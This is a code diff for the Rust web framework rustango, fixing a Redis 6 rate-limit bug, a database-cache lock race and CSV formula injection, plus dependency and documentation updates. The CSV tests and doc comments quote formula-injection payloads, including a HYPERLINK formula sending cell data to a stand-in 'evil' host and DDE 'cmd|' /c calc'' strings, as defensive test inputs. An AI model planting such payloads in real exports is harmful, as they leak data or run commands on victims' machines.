@@ -2602,10 +2701,22 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "2b38e32f0abccf9987a4e3079dfb67dcd799fb61361e53e2882c3cbaf0d905d8"
 
 [[package]]
+name = "windows_aarch64_gnullvm"
+version = "0.52.6"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "32a4622180e7a0ec044bb555404c800bc9fd9ec262ec147edd5989ccd0c02cd3"
+
+[[package]]
 name = "windows_aarch64_msvc"
 version = "0.48.5"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "dc35310971f3b2dbbf3f0690a219f40e2d9afcf64f9ab7cc1be722937c26b4bc"
+
+[[package]]
+name = "windows_aarch64_msvc"
+version = "0.52.6"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "09ec2a7bb152e2252b53fa7803150007879548bc709c039df7627cabbd05d469"
 
 [[package]]
 name = "windows_i686_gnu"
@@ -2614,10 +2725,28 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "a75915e7def60c94dcef72200b9a8e58e5091744960da64ec734a6c6e9b3743e"
 
 [[package]]
+name = "windows_i686_gnu"
+version = "0.52.6"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "8e9b5ad5ab802e97eb8e295ac6720e509ee4c243f69d781394014ebfe8bbfa0b"
+
+[[package]]
+name = "windows_i686_gnullvm"
+version = "0.52.6"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "0eee52d38c090b3caa76c563b86c3a4bd71ef1a819287c19d586d7334ae8ed66"
+
+[[package]]
 name = "windows_i686_msvc"
 version = "0.48.5"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "8f55c233f70c4b27f66c523580f78f1004e8b5a8b659e05a4eb49d4166cca406"
+
+[[package]]
+name = "windows_i686_msvc"
+version = "0.52.6"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "240948bc05c5e7c6dabba28bf89d89ffce3e303022809e73deaefe4f6ec56c66"
 
 [[package]]
 name = "windows_x86_64_gnu"
@@ -2626,16 +2755,34 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "53d40abd2583d23e4718fddf1ebec84dbff8381c07cae67ff7768bbf19c6718e"
 
 [[package]]
+name = "windows_x86_64_gnu"
+version = "0.52.6"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "147a5c80aabfbf0c7d901cb5895d1de30ef2907eb21fbbab29ca94c5b08b1a78"
+
+[[package]]
 name = "windows_x86_64_gnullvm"
 version = "0.48.5"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "0b7b52767868a23d5bab768e390dc5f5c55825b6d30b86c844ff2dc7414044cc"
 
 [[package]]
+name = "windows_x86_64_gnullvm"
+version = "0.52.6"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "24d5b23dc417412679681396f2b49f3de8c1473deb516bd34410872eff51ed0d"
+
+[[package]]
 name = "windows_x86_64_msvc"
 version = "0.48.5"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "ed94fce61571a4006852b7389a063ab983c02eb1bb37b47f8272ce92d06d9538"
+
+[[package]]
+name = "windows_x86_64_msvc"
+version = "0.52.6"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "589f6da84c646204747d1270a2a5661ea66ed1cced2631d546fdfb155959f9ec"
 
 [[package]]
 name = "winnow"

--- a/crates/rustango/examples/tenant_user_extension/Cargo.lock
+++ b/crates/rustango/examples/tenant_user_extension/Cargo.lock
@@ -2132,9 +2132,9 @@ dependencies = [
 
 [[package]]
 name = "tinyvec"
-version = "1.12.0"
+version = "1.13.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "bb4ebadaa0af04fab11ae01eb5f9fdb5f9c5b875506e210e71c07873528baa7f"
+checksum = "22e6cd18156ba6530d7deea039a6c1a6ec4f173dd330a9a53a4ea569fe85abac"
 dependencies = [
  "tinyvec_macros",
 ]

--- a/crates/rustango/src/account_lockout.rs
+++ b/crates/rustango/src/account_lockout.rs
@@ -147,13 +147,32 @@ impl Lockout {
         // `incr` is still get+set — acceptable for single-process use,
         // and the multi-replica deploy that needs cross-process
         // atomicity is on Redis anyway.
-        let next = u32::try_from(
-            self.cache
-                .incr(&counter_key, 1, Some(self.counter_ttl))
-                .await
-                .unwrap_or(0),
-        )
-        .unwrap_or(u32::MAX);
+        //
+        // A cache failure here means the attempt is NOT counted, so
+        // lockout silently stops engaging — the failure mode that let
+        // #1280 (Redis 6 + `EXPIRE … NX`) disable brute-force protection
+        // on every call with no signal at all. Keep failing open (a cache
+        // outage locking every account out is its own denial of service,
+        // and it matches `rate_limit_cache::take`'s documented policy)
+        // but make it loud, so "lockout isn't working" is diagnosable
+        // from the logs instead of invisible.
+        let counted = match self
+            .cache
+            .incr(&counter_key, 1, Some(self.counter_ttl))
+            .await
+        {
+            Ok(n) => n,
+            Err(e) => {
+                tracing::warn!(
+                    error = %e,
+                    account,
+                    "account-lockout counter failed; this failed attempt is NOT counted \
+                     and lockout will not engage"
+                );
+                0
+            }
+        };
+        let next = u32::try_from(counted).unwrap_or(u32::MAX);
         if next >= self.max_attempts {
             // Set the lock flag with TTL = lockout_duration
             let _ = self

--- a/crates/rustango/src/cache/db_backend.rs
+++ b/crates/rustango/src/cache/db_backend.rs
@@ -236,6 +236,108 @@ impl Cache for DatabaseCache {
         Ok(())
     }
 
+    /// Atomic set-if-absent (#1281).
+    ///
+    /// Without this override `DatabaseCache` inherited the trait default
+    /// — `exists()` then `set()` — which is a check-then-act across two
+    /// round trips, and `set` is an unconditional upsert, so two racers
+    /// both saw "absent", both wrote, and **both got `Ok(true)`**. That
+    /// silently voided `DistributedLock`'s entire guarantee on this
+    /// backend: two processes ran the same guarded body. Redis and
+    /// in-memory already overrode `add`; this was the third backend.
+    ///
+    /// An expired row must still be acquirable, so this is not a bare
+    /// `INSERT` — it takes the row when it is absent *or* already
+    /// expired, and reports whether it did. `expires = 0` means "never
+    /// expires" (see [`Self::expires_for`]), so a live persistent entry
+    /// is never stolen.
+    ///
+    /// The database does the test-and-set under row locks, so a race
+    /// resolves to exactly one winner: the loser's `WHERE` no longer
+    /// matches once the winner has pushed `expires` into the future.
+    async fn add(&self, key: &str, value: &str, ttl: Option<Duration>) -> Result<bool, CacheError> {
+        let dialect = self.pool.dialect();
+        let table = dialect.quote_ident(&self.table);
+        let p1 = dialect.placeholder(1);
+        let p2 = dialect.placeholder(2);
+        let p3 = dialect.placeholder(3);
+        let p4 = dialect.placeholder(4);
+        let expires = Self::expires_for(ttl);
+        let now = Self::now_unix_ms();
+
+        // Bind order is *textual* placeholder order, not logical order:
+        // MySQL and SQLite use positional `?`, so the args must appear in
+        // the sequence the placeholders do. (Postgres' numbered `$n`
+        // would tolerate any order, which is exactly how a MySQL-only
+        // mismatch stays hidden until a MySQL test runs it.)
+        if dialect.name() == "mysql" {
+            // MySQL's `ON DUPLICATE KEY UPDATE` takes no WHERE, so the
+            // conditional take is two statements. Both are individually
+            // atomic and the pair is still race-free: the INSERT settles
+            // the absent case, and for the expired case the UPDATE's own
+            // predicate is the compare-and-swap — whoever lands first
+            // moves `expires` forward and the other matches nothing.
+            let inserted = raw_execute_pool(
+                &self.pool,
+                &format!(
+                    "INSERT IGNORE INTO {table} (cache_key, value, expires) \
+                     VALUES ({p1}, {p2}, {p3})"
+                ),
+                vec![
+                    SqlValue::String(key.to_owned()),
+                    SqlValue::String(value.to_owned()),
+                    SqlValue::I64(expires),
+                ],
+            )
+            .await
+            .map_err(|e| CacheError::Connection(format!("add: {e}")))?;
+            if inserted == 1 {
+                return Ok(true);
+            }
+            let took = raw_execute_pool(
+                &self.pool,
+                &format!(
+                    "UPDATE {table} SET value = {p1}, expires = {p2} \
+                     WHERE cache_key = {p3} AND expires <> 0 AND expires <= {p4}"
+                ),
+                vec![
+                    SqlValue::String(value.to_owned()),
+                    SqlValue::I64(expires),
+                    SqlValue::String(key.to_owned()),
+                    SqlValue::I64(now),
+                ],
+            )
+            .await
+            .map_err(|e| CacheError::Connection(format!("add: {e}")))?;
+            return Ok(took == 1);
+        }
+
+        // Postgres and SQLite both support `ON CONFLICT … DO UPDATE …
+        // WHERE`, which expresses the whole thing in one statement:
+        // insert, or overwrite only an expired row. When the predicate
+        // fails nothing is written and the statement reports 0 rows.
+        let took = raw_execute_pool(
+            &self.pool,
+            &format!(
+                "INSERT INTO {table} (cache_key, value, expires) \
+                 VALUES ({p1}, {p2}, {p3}) \
+                 ON CONFLICT (cache_key) DO UPDATE \
+                 SET value = EXCLUDED.value, expires = EXCLUDED.expires \
+                 WHERE {table}.expires <> 0 AND {table}.expires <= {p4}"
+            ),
+            // Textual placeholder order — see the note above.
+            vec![
+                SqlValue::String(key.to_owned()),
+                SqlValue::String(value.to_owned()),
+                SqlValue::I64(expires),
+                SqlValue::I64(now),
+            ],
+        )
+        .await
+        .map_err(|e| CacheError::Connection(format!("add: {e}")))?;
+        Ok(took == 1)
+    }
+
     async fn delete(&self, key: &str) -> Result<(), CacheError> {
         let dialect = self.pool.dialect();
         let table = dialect.quote_ident(&self.table);

--- a/crates/rustango/src/cache/redis_backend.rs
+++ b/crates/rustango/src/cache/redis_backend.rs
@@ -195,25 +195,41 @@ impl Cache for RedisCache {
 
     async fn incr(&self, key: &str, by: i64, ttl: Option<Duration>) -> Result<i64, CacheError> {
         let mut conn = self.conn.clone();
-        let new: i64 = redis::cmd("INCRBY")
-            .arg(key)
+        // Increment and set the TTL *only if the key has none*, in one
+        // atomic server-side step.
+        //
+        // Setting the TTL on first creation only is what makes a
+        // fixed-window rate limiter work: an unconditional EXPIRE on
+        // every tick would slide the window forward forever and the
+        // limit would never be reached.
+        //
+        // This was `INCRBY` followed by `EXPIRE key secs NX` (#1280).
+        // The `NX` flag on EXPIRE is Redis **7.0+**; on 6.x the server
+        // answers `ERR wrong number of arguments for 'expire' command`,
+        // so `incr` returned `Err` on every call — and both callers fail
+        // open, silently disabling rate limiting
+        // (`rate_limit_cache::take`) and account lockout
+        // (`account_lockout`). Worse, the INCRBY had already landed, so
+        // each counter was created with no TTL at all and never expired.
+        //
+        // `EVAL` is Redis 2.6+, so the Lua form is portable to every
+        // version we could plausibly meet (and to ElastiCache /
+        // Cosmos / DocumentDB). `TTL` returns -1 for "exists, no
+        // expiry" and -2 for "missing"; after the INCRBY the key
+        // always exists, so `< 0` means "no expiry set".
+        let script = redis::Script::new(
+            r"local n = redis.call('INCRBY', KEYS[1], ARGV[1])
+              if tonumber(ARGV[2]) > 0 and redis.call('TTL', KEYS[1]) < 0 then
+                redis.call('EXPIRE', KEYS[1], ARGV[2])
+              end
+              return n",
+        );
+        script
+            .key(key)
             .arg(by)
-            .query_async(&mut conn)
+            .arg(self.effective_ttl(ttl).unwrap_or(0))
+            .invoke_async(&mut conn)
             .await
-            .map_err(|e| CacheError::Connection(e.to_string()))?;
-        // EXPIRE on first creation only — INCR-then-EXPIRE on every call
-        // would reset the window each tick, breaking fixed-window rate
-        // limiters. The NX flag is exactly the "set TTL only if no TTL"
-        // semantic we want.
-        if let Some(secs) = self.effective_ttl(ttl) {
-            let _: i64 = redis::cmd("EXPIRE")
-                .arg(key)
-                .arg(secs)
-                .arg("NX")
-                .query_async(&mut conn)
-                .await
-                .map_err(|e| CacheError::Connection(e.to_string()))?;
-        }
-        Ok(new)
+            .map_err(|e| CacheError::Connection(e.to_string()))
     }
 }

--- a/crates/rustango/src/config/sections.rs
+++ b/crates/rustango/src/config/sections.rs
@@ -175,6 +175,9 @@ pub struct McpSettings {
     pub rate_limit_per_minute: Option<u32>,
     /// Max tools returned by `tools/list` (`None` = unlimited).
     pub max_tools_listed: Option<usize>,
+    /// Max JSON-RPC request body in bytes. Default 1 MiB — raise it when a
+    /// tool accepts inline payloads (e.g. base64 media uploads).
+    pub max_body_bytes: Option<usize>,
 }
 
 impl McpSettings {
@@ -192,6 +195,11 @@ impl McpSettings {
     #[must_use]
     pub fn sse_enabled(&self) -> bool {
         self.enable_sse.unwrap_or(true)
+    }
+    /// Request-body cap in bytes, defaulting to 1 MiB.
+    #[must_use]
+    pub fn max_body_bytes(&self) -> usize {
+        self.max_body_bytes.unwrap_or(1024 * 1024)
     }
 }
 

--- a/crates/rustango/src/csv.rs
+++ b/crates/rustango/src/csv.rs
@@ -77,6 +77,9 @@ fn json_cell_to_string(v: Option<&serde_json::Value>) -> String {
 pub struct CsvWriter {
     out: String,
     column_count: Option<usize>,
+    /// When `true` (the default) a value that would be read as a
+    /// spreadsheet formula is neutralised. See [`Self::raw_formulas`].
+    allow_formulas: bool,
 }
 
 impl CsvWriter {
@@ -124,15 +127,68 @@ impl CsvWriter {
         &self.out
     }
 
+    /// Opt out of formula neutralisation and emit values byte-for-byte.
+    ///
+    /// Only for CSV consumed by a machine. Anything a person may open in
+    /// Excel / LibreOffice / Sheets should keep the default — see
+    /// [`neutralize_formula`] for what it guards against.
+    #[must_use]
+    pub fn raw_formulas(mut self) -> Self {
+        self.allow_formulas = true;
+        self
+    }
+
     fn write_row(&mut self, row: &[String]) {
         for (i, field) in row.iter().enumerate() {
             if i > 0 {
                 self.out.push(',');
             }
-            self.out.push_str(&escape_field(field));
+            let field = if self.allow_formulas {
+                escape_field(field)
+            } else {
+                escape_field(&neutralize_formula(field))
+            };
+            self.out.push_str(&field);
         }
         self.out.push_str("\r\n");
     }
+}
+
+/// Defuse a cell that a spreadsheet would evaluate as a formula
+/// (CWE-1236, #1283).
+///
+/// Excel, LibreOffice and Google Sheets treat a leading `=`, `+`, `-`,
+/// `@` — and a leading tab or CR — as the start of a formula, so an
+/// exported value like
+///
+/// ```text
+/// =HYPERLINK("https://evil.example/?d="&A1,"Click for details")
+/// ```
+///
+/// runs on open. RFC 4180 quoting does not help: the quotes are stripped
+/// before the cell is parsed. The fix is to prefix the value with a
+/// single quote, which spreadsheets consume as "this is literal text".
+///
+/// **Numbers are left alone.** A blanket prefix would mangle every
+/// negative number in an export (`-5` → `'-5`), so a field that parses
+/// as a plain number passes through untouched — `-5` and `+3.14` are
+/// data, `-2+cmd|'/c calc'!A0` is not.
+#[must_use]
+pub fn neutralize_formula(s: &str) -> String {
+    let Some(first) = s.chars().next() else {
+        return s.to_owned();
+    };
+    if !matches!(first, '=' | '+' | '-' | '@' | '\t' | '\r') {
+        return s.to_owned();
+    }
+    // A well-formed number is not a formula, whatever it starts with.
+    if s.parse::<f64>().is_ok() {
+        return s.to_owned();
+    }
+    let mut out = String::with_capacity(s.len() + 1);
+    out.push('\'');
+    out.push_str(s);
+    out
 }
 
 /// Escape one CSV field per RFC 4180.
@@ -223,6 +279,76 @@ mod tests {
         w.headers(&["a", "b"]);
         w.row(&["1", "2", "3", "4"]); // long
         assert_eq!(w.into_string(), "a,b\r\n1,2\r\n");
+    }
+
+    // ---- #1283 formula injection ----
+
+    #[test]
+    fn leading_formula_triggers_are_neutralised() {
+        // The classic: an exfiltrating hyperlink in a user-set field.
+        assert_eq!(
+            neutralize_formula(r#"=HYPERLINK("http://evil/?"&A1,"x")"#),
+            r#"'=HYPERLINK("http://evil/?"&A1,"x")"#
+        );
+        assert_eq!(neutralize_formula("+SUM(A1)"), "'+SUM(A1)");
+        assert_eq!(neutralize_formula("@SUM(A1)"), "'@SUM(A1)");
+        assert_eq!(
+            neutralize_formula("-2+3+cmd|' /c calc'!A0"),
+            "'-2+3+cmd|' /c calc'!A0"
+        );
+        // Leading tab / CR are formula lead-ins in Excel too.
+        assert_eq!(neutralize_formula("\t=1+1"), "'\t=1+1");
+        assert_eq!(neutralize_formula("\r=1+1"), "'\r=1+1");
+    }
+
+    #[test]
+    fn numbers_are_not_mangled() {
+        // A blanket prefix would wreck every negative number in an
+        // export. These are data, not formulas.
+        for n in ["-5", "-5.25", "+3.14", "0", "1e6", "-1e-6"] {
+            assert_eq!(neutralize_formula(n), n, "{n} must pass through");
+        }
+    }
+
+    #[test]
+    fn ordinary_text_is_untouched() {
+        for s in ["", "plain", "a,b", "hello world", "user@example.com"] {
+            assert_eq!(neutralize_formula(s), s);
+        }
+    }
+
+    #[test]
+    fn writer_neutralises_by_default_and_still_quotes() {
+        let mut w = CsvWriter::new();
+        w.headers(["name"]);
+        w.row(["=1+1"]);
+        // Prefixed, and the leading quote does not itself force quoting.
+        assert_eq!(w.as_str(), "name\r\n'=1+1\r\n");
+
+        // A formula containing a comma still gets RFC 4180 quoting on
+        // top of the prefix.
+        let mut w = CsvWriter::new();
+        w.row(["=A1,B1"]);
+        assert_eq!(w.as_str(), "\"'=A1,B1\"\r\n");
+    }
+
+    #[test]
+    fn raw_formulas_opt_out_emits_verbatim() {
+        let mut w = CsvWriter::new().raw_formulas();
+        w.row(["=1+1"]);
+        assert_eq!(w.as_str(), "=1+1\r\n");
+    }
+
+    #[test]
+    fn json_export_helper_is_protected_by_default() {
+        // The shape csv_response.rs documents: user-controlled fields
+        // dumped for an operator to open.
+        let rows = vec![serde_json::json!({ "name": "=cmd|' /c calc'!A0" })];
+        let out = csv_from_json_rows(&["name"], &rows).into_string();
+        assert!(
+            out.contains("'=cmd"),
+            "exported user data must be neutralised: {out}"
+        );
     }
 
     #[test]

--- a/crates/rustango/src/lib.rs
+++ b/crates/rustango/src/lib.rs
@@ -18,10 +18,10 @@
 //!
 //! ```toml
 //! [dependencies]
-//! rustango = "0.55"                                        # Postgres (the default backend)
+//! rustango = "0.56"                                        # Postgres (the default backend)
 //! # or pick another backend — see "Choosing a backend" below:
-//! rustango = { version = "0.55", default-features = false, features = ["sqlite", "batteries"] }
-//! rustango = { version = "0.55", default-features = false, features = ["mysql",  "batteries"] }
+//! rustango = { version = "0.56", default-features = false, features = ["sqlite", "batteries"] }
+//! rustango = { version = "0.56", default-features = false, features = ["mysql",  "batteries"] }
 //! ```
 //!
 //! `default = ["postgres", "batteries"]`. The **`batteries`** feature is

--- a/crates/rustango/src/lib.rs
+++ b/crates/rustango/src/lib.rs
@@ -1,191 +1,161 @@
-//! rustango — a Django-shaped, batteries-included web framework for Rust.
+//! **rustango** — a Django-shaped, batteries-included web framework for Rust.
 //!
-//! ORM with auto-migrations, auto-admin, multi-tenancy, sessions +
-//! JWT + OAuth2/OIDC + HMAC auth, DRF-style serializers + viewsets,
-//! signals, caching, media (S3/R2/B2/MinIO), email pipeline,
-//! background jobs, scheduled tasks, OpenAPI 3.1 auto-derive, every
-//! standard middleware. Postgres + MySQL + **SQLite** through the
-//! same `&Pool` API, opt-in via Cargo features.
+//! A full-stack toolkit around one derive macro and one connection type:
+//! a typed ORM with auto-migrations, an auto-generated admin, multi-tenancy,
+//! auth (sessions / JWT / OAuth2-OIDC / HMAC / passkeys), DRF-style serializers
+//! and viewsets, signals, caching, media (S3 / R2 / B2 / MinIO), an email
+//! pipeline, background jobs, scheduled tasks, OpenAPI 3.1, and the standard
+//! production middleware. **Postgres, MySQL and SQLite** run through the same
+//! [`sql::Pool`] and the same `#[derive(Model)]` types — the backend is a
+//! Cargo feature, not a rewrite.
+//!
+//! Everything is opt-in: pull only the features you use, down to the bare ORM
+//! with no HTTP stack. See the
+//! [CHANGELOG](https://github.com/ujeenet/rustango/blob/main/CHANGELOG.md) for
+//! release history.
+//!
+//! # Install
 //!
 //! ```toml
 //! [dependencies]
-//! rustango = "0.41"                                       # Postgres (default)
-//! rustango = { version = "0.41", features = ["sqlite"] }  # SQLite
-//! rustango = { version = "0.41", features = ["mysql"] }   # MySQL 8.0+
+//! rustango = "0.55"                                        # Postgres (the default backend)
+//! # or pick another backend — see "Choosing a backend" below:
+//! rustango = { version = "0.55", default-features = false, features = ["sqlite", "batteries"] }
+//! rustango = { version = "0.55", default-features = false, features = ["mysql",  "batteries"] }
 //! ```
 //!
-//! ## What's new in v0.41 (May 2026) — Tier 1 ORM gap-closure batch
+//! `default = ["postgres", "batteries"]`. The **`batteries`** feature is
+//! everything-except-the-backend (admin, tenancy-ready ORM, serializers,
+//! auth, jobs, cache, media, middleware, …); a backend feature is added
+//! separately so a project can keep the batteries while choosing its
+//! database. Drop `batteries` for the bare ORM (no axum, no Tera).
 //!
-//! Django-shape syntax with Rust-shape compile-time safety. Ten ORM
-//! tickets across 14 PRs ([epic #273]):
+//! # A taste
 //!
-//! - **[`Q!()`] compile-time macro** ([#269]) — `Q!(User.email__icontains
-//!   = "alice")` expands at parse time to the typed-column call.
-//!   Typo'd field names fail the build.
-//! - **[`query::Q`] runtime composable predicate** ([#263]) — for
-//!   dynamic filter trees (admin chips, REST query params). Operator
-//!   overloads: `&` / `|` / `^` / `!`.
-//! - **[`QuerySet::distinct_on`]** ([#264]) — PG `DISTINCT ON` native +
-//!   `ROW_NUMBER()` portable fallback on MySQL/SQLite. The "latest per
-//!   group" pattern, tri-dialect.
-//! - **[`Model::bulk_upsert_pool`] / [`Model::bulk_insert_or_ignore_pool`]**
-//!   ([#267]) — Django `bulk_create(update_conflicts=True)` /
-//!   `(ignore_conflicts=True)` across PG, MySQL, and SQLite.
-//! - **`#[rustango(unique_when(...))]`** ([#265]) — partial unique
-//!   indexes (Django `UniqueConstraint(condition=Q(...))`). PG/SQLite
-//!   native; MySQL warns + falls back.
-//! - **DB functions batch 1** ([#266]) — Cast, LPad, RPad, MD5, SHA1,
-//!   SHA256, Position, Repeat, Reverse, Sign, Mod, Power, Sqrt — per-
-//!   dialect emission with clean `NotSupported` errors on SQLite for
-//!   the genuinely-missing items (hashes, Reverse, Power/Sqrt without
-//!   `SQLITE_ENABLE_MATH_FUNCTIONS`).
-//! - **`AggregateBuilder::alias()`** ([#268]) — Django 3.2 non-
-//!   projected annotation. Filter/order by a derived aggregate without
-//!   paying the column-decode cost.
-//! - **`#[rustango(manager(ext = "..."))]`** ([#271]) — derive emits
-//!   the custom-manager extension trait next to the model.
-//! - **[`sql::explain_pool`]** ([#272]) — tri-dialect query plan
-//!   helper. PG `EXPLAIN (FORMAT JSON, ANALYZE, BUFFERS)`, MySQL
-//!   `EXPLAIN ANALYZE` / `FORMAT=TREE` / `FORMAT=JSON`, SQLite
-//!   `EXPLAIN QUERY PLAN`.
-//! - **PG-typed legacy executor deleted** ([#270], 4 waves) — the
-//!   bi-API confusion is gone. `Fetcher`/`Counter`/`Updater`/`Deleter`
-//!   extension traits + the `&PgPool` standalone fns +
-//!   `transaction`/`count_rows`/`raw_execute`/`bulk_update` are
-//!   removed. The `_on` family moved to a `#[doc(hidden)]` module for
-//!   macro use only. **Migration**: drop the trait imports, switch
-//!   `.fetch(pool)` → `.fetch_on(pool)` (inherent on QuerySet),
-//!   `.delete(pool)` → `.delete_on(pool)`, `.execute(pool)` (on
-//!   UpdateBuilder) → `.execute_on(pool)`. Use the `_pool` family for
-//!   tri-dialect calls.
+//! ```ignore
+//! use rustango::Model;
+//! use rustango::sql::{Auto, Pool, FetcherPool};
 //!
-//! Full ticket index: PRs #274–#286.
+//! // One derive gives a table, typed columns, migrations, and admin wiring.
+//! #[derive(Model, Clone, Debug)]
+//! #[rustango(table = "posts")]
+//! struct Post {
+//!     #[rustango(primary_key)]
+//!     id: Auto<i64>,                 // server-assigned auto-increment PK
+//!     #[rustango(max_length = 200)]
+//!     title: String,
+//!     body: String,
+//!     published: bool,
+//! }
 //!
-//! [`Q!()`]: rustango_macros::Q
-//! [`query::Q`]: crate::query::Q
-//! [`QuerySet::distinct_on`]: crate::query::QuerySet::distinct_on
-//! [`Model::bulk_upsert_pool`]: crate::core::Model
-//! [`Model::bulk_insert_or_ignore_pool`]: crate::core::Model
-//! [`sql::explain_pool`]: crate::sql::explain_pool
-//! [epic #273]: https://github.com/ujeenet/rustango/issues/273
-//! [#263]: https://github.com/ujeenet/rustango/pull/279
-//! [#264]: https://github.com/ujeenet/rustango/pull/280
-//! [#265]: https://github.com/ujeenet/rustango/pull/282
-//! [#266]: https://github.com/ujeenet/rustango/pull/277
-//! [#267]: https://github.com/ujeenet/rustango/pull/281
-//! [#268]: https://github.com/ujeenet/rustango/pull/274
-//! [#269]: https://github.com/ujeenet/rustango/pull/276
-//! [#270]: https://github.com/ujeenet/rustango/issues/270
-//! [#271]: https://github.com/ujeenet/rustango/pull/278
-//! [#272]: https://github.com/ujeenet/rustango/pull/275
+//! # async fn demo() -> Result<(), Box<dyn std::error::Error>> {
+//! // One connection type for every backend — the driver is chosen from the
+//! // URL scheme (postgres://…, mysql://…, sqlite://…).
+//! let pool = Pool::connect(&std::env::var("DATABASE_URL")?).await?;
 //!
-//! ## What's new in v0.40 (May 2026)
+//! // Django-shape queries, compiled to your dialect.
+//! let recent: Vec<Post> = Post::objects()
+//!     .filter("published", true)
+//!     .order_by_desc("id")
+//!     .limit(10)
+//!     .fetch(&pool)
+//!     .await?;
+//! # let _ = recent; Ok(())
+//! # }
+//! ```
 //!
-//! - **Admin session auth without tenancy** ([epic #253]) — bare
-//!   [`admin`] now ships a styled `/login` form, signed-cookie
-//!   sessions ([`session::SessionSecret`]), sidebar Logout, password
-//!   change at `/account/password`, [`manage create-admin`][admin-cli]
-//!   CLI verb, and `is_superuser` gating. Opt in via
-//!   [`admin::Builder::with_session_auth`]. Same signing key works
-//!   across [`tenancy::session`] + [`admin::session`] (different
-//!   cookie names + payloads so cookies never cross-decode).
-//! - **GenericForeignKey ergonomics + admin inlines** ([epic #246])
-//!   — `#[rustango(generic_fk(name, ct_column, pk_column))]` emits
-//!   typed `target_pool()` accessor + `set_target_for::<T>()`
-//!   setter. Admin list view collapses the `(ct_id, object_pk)` pair
-//!   into one clickable target link. New
-//!   [`register_admin_inline_generic!`] renders polymorphic children
-//!   as inline panels on the parent's detail + edit pages.
-//!   ContentType `<select>` picker replaces raw integer inputs on
-//!   the standalone create/edit form.
-//! - **Field [`help_text`]** — `#[rustango(help_text = "…")]` on any
-//!   field renders a muted caption below the admin form input.
-//!   The string lives on [`core::FieldSchema::help_text`] so future
-//!   surfaces (DRF schemas, OpenAPI descriptions) can read the same
-//!   source.
-//! - **Shared `.btn` family** — admin + operator-console buttons,
-//!   links, sidebar Logout, inline-panel row links all look like
-//!   one product. Consistent across bare admin / tenant admin /
-//!   operator console.
-//! - **Reusable foundations** — [`session::SessionSecret`] +
-//!   [`session::sign`] (HMAC primitive) and
-//!   [`manage_interactive`] (TTY prompts) promoted to the crate
-//!   root so the bare admin can reuse them without `tenancy`
-//!   compiled in.
-//! - **Runnable demo**: [`examples/gfk_demo`](https://github.com/ujeenet/rustango/tree/main/crates/rustango/examples/gfk_demo)
-//!   exercises every new admin + GFK surface end-to-end on SQLite.
+//! # Choosing a backend
 //!
-//! [epic #246]: https://github.com/ujeenet/rustango/issues/246
-//! [epic #253]: https://github.com/ujeenet/rustango/issues/253
-//! [admin-cli]: crate::manage::Cli
-//! [`help_text`]: crate::core::FieldSchema::help_text
-//! [`register_admin_inline_generic!`]: crate::register_admin_inline_generic
-//! [`manage_interactive`]: crate::manage_interactive
+//! rustango is **tri-dialect**. The same models and queries emit Postgres,
+//! MySQL or SQLite SQL; the backend is selected by Cargo feature and by the
+//! `DATABASE_URL` scheme.
 //!
-//! Defaults pull `postgres`, `admin`, and `runserver` (the bi-dialect
-//! single-pool [`server::AppBuilder`]). Add `"tenancy"` for the
-//! multi-tenant resolver / pools / per-tenant auth. Tenancy is
-//! tri-dialect since v0.33: [`tenancy::TenantPools`] is generic over
-//! the backend, database-mode tenants work on every backend, and
-//! schema-mode stays Postgres-only by language semantics. Add
-//! `"mysql"` or `"sqlite"` for additional backends — the same
-//! `#[derive(Model)]` types and `_pool` ORM API work against any of
-//! them. Drop `default-features` for the bare ORM (no axum, no Tera).
+//! - **Connect with [`sql::Pool::connect`]** — it reads the URL scheme and
+//!   builds the right pool. Prefer it over `sqlx::PgPool::connect(...)`, which
+//!   only exists when the `postgres` feature is on and fails to compile
+//!   without it.
+//! - **[`sql::Pool`]** is the backend-erasing enum every rustango API takes
+//!   (`&Pool`). A concrete `sqlx::PgPool` / `SqlitePool` / `MySqlPool` converts
+//!   into it via `From`, so you can pass either.
+//! - **Enable exactly one backend feature** (`postgres`, `mysql`, or `sqlite`)
+//!   for a single-database app; enable several to build one binary that serves
+//!   any of them.
+//! - Multi-tenancy is tri-dialect: [`tenancy::TenantPools`] is generic over the
+//!   backend and database-mode tenants work everywhere. Schema-mode tenancy is
+//!   Postgres-only (it uses `SET search_path`, which MySQL/SQLite lack).
 //!
-//! # Quick start
+//! # Feature flags
+//!
+//! | Feature | Gives you |
+//! |---|---|
+//! | `postgres` / `mysql` / `sqlite` | The database backend(s). |
+//! | `batteries` | The default bundle minus the backend (see [Install](#install)). |
+//! | `admin` | Auto-generated admin UI + session auth. |
+//! | `tenancy` | Multi-tenant resolver, per-tenant pools, operator console. |
+//! | `serializer` | DRF-style serializers + `#[derive(ViewSet)]` REST endpoints. |
+//! | `jwt` / `oauth2` | Token auth; social / OIDC login. |
+//! | `jobs` / `jobs-postgres` | Background jobs (in-memory / durable). |
+//! | `cache` / `cache-redis` | Cache layer; Redis backend. |
+//! | `storage` / `storage-s3` / `media` | File storage + the `Media` model. |
+//! | `mcp` | Model Context Protocol server over HTTP. |
+//! | `openapi` | OpenAPI 3.1 schema auto-derive. |
+//!
+//! Every feature has an entry in the crate's `Cargo.toml` with a one-line note.
+//!
+//! # Quick start (scaffolder)
 //!
 //! ```bash
 //! cargo install cargo-rustango
 //! cargo rustango new myblog                 # default: ORM + admin
 //! cargo rustango new myapi --template api   # JSON-only, no admin
 //! cargo rustango new shop --template tenant # multi-tenancy + operator console
-//! ```
 //!
-//! Then:
-//!
-//! ```bash
 //! cd myblog
 //! cp .env.example .env                      # set DATABASE_URL
 //! cargo run -- migrate                      # apply bootstrap migrations
 //! cargo run                                 # http://localhost:8080
 //! ```
 //!
